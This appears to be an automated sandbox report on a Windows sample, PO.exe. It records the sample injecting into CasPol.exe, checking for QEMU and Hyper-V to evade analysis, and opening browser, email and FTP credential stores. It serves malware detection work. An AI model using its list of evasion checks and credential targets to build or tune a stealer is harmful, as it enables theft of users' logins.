Source: C:\Users\user\Desktop\PO.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_004046DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\One Jump to behavior
Source: PO.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: Yara match File source: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.84958072563.0000000001110000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A2FF5 push cs; retf 1_2_032A3005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01049297 push eax; iretd 4_2_010492C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01467E2F push edi; retn 0000h 4_2_01467E31
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
Source: C:\Users\user\Desktop\PO.exe File created: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\PO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\PO.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\PO.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP A
Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2364 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2364 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5828 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0D2D rdtsc 1_2_032A0D2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9851 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_0040596F
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004064C1 FindFirstFileW,FindClose, 1_2_004064C1
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004027FB FindFirstFileW, 1_2_004027FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\PO.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\PO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PO.exe API call chain: ExitProcess graph end node
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep a
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000004.00000002.89317737865.000000000152C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89316980207.00000000014CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0D2D rdtsc 1_2_032A0D2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032C3323 mov eax, dword ptr fs:[00000030h] 1_2_032C3323
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032C5559 mov eax, dword ptr fs:[00000030h] 1_2_032C5559
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6243 mov eax, dword ptr fs:[00000030h] 1_2_032A6243
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032AB2AB mov eax, dword ptr fs:[00000030h] 1_2_032AB2AB
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032ABAFF mov eax, dword ptr fs:[00000030h] 1_2_032ABAFF
Source: C:\Users\user\Desktop\PO.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032C3341 LdrLoadDll, 1_2_032C3341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\PO.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1110000 Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A77C4 cpuid 1_2_032A77C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 1_2_004061A0

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR
Source: Yara match File source: 00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: Yara match File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR
Source: Yara match File source: 00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs